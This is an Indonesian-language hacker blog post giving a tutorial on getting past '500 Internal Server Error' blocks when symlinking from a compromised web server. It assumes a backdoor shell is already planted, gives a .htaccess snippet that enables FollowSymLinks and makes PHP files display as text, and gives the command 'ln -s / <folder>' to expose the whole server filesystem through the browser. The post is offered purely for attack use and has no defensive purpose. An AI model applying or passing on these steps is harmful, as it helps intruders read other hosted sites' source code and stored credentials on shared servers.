Bypass Symlink 500 ISE 2018

Oke Kali ini saya akan post tutorial Bypass Symlink 2017 Internal Server Error . Mungkin para mastah sudah mengetahuinya :)Oke cekidot



Udah dapet symlink ribuan bahkan puluhan ribu tapi internal server error :(
kasian banget gan .. langsung saja


Untuk cara bypass bisa dibilang cukup mudah bahkan agak sulit  :v

Bahan-bahan :

1. Shell backdoor yang tertanam di web yang mau di symlink
2. Web yang mau disymlink vuln/bisa
3.Kopi udud jan lupa gan :v

Prof of Concept :

1. Buat Direktory baru/buat folder baru namanya apa terserah mau di dir mana terserah
contoh: Folder namanya symlinkngentot

2. Buat new file/file baru buat .htaccess di dalam folder yang dibuat tadi.
nb : *ingat ya htaccess pake (titik) di depan nama htaccess jadi .htaccess

3. Isi .htaccess dengan kode berikut

Options Indexes FollowSymLinks
DirectoryIndex ps.html
AddType txt .php
AddHandler txt .php

4. Save file tersebut

5. Buka menu command di shell kalian

6. Dan ketikan perintah di command shell kalian

ln -s / symlinkngentot

7. Klik run

8. Buka directory mu tadi contoh target.co.li/symlinkngentot

Oke gan dah bisa tinggal di anuin :v

Sekian tutor kali ini semoga bermanfaat :*
Marcadores:

Post a Comment

[blogger]

Zaenal Arifin

{facebook#https://www.facebook.com/darkvenom.gov} {twitter#https://twitter.com/steviefar07} {google-plus#https://plus.google.com/u/0/117673850650242989379} {youtube#https://www.youtube.com/c/KaizenJavaHaxor}

Contact Form

Name

Email *

Message *

Powered by Blogger.
Javascript DisablePlease Enable Javascript To See All Widget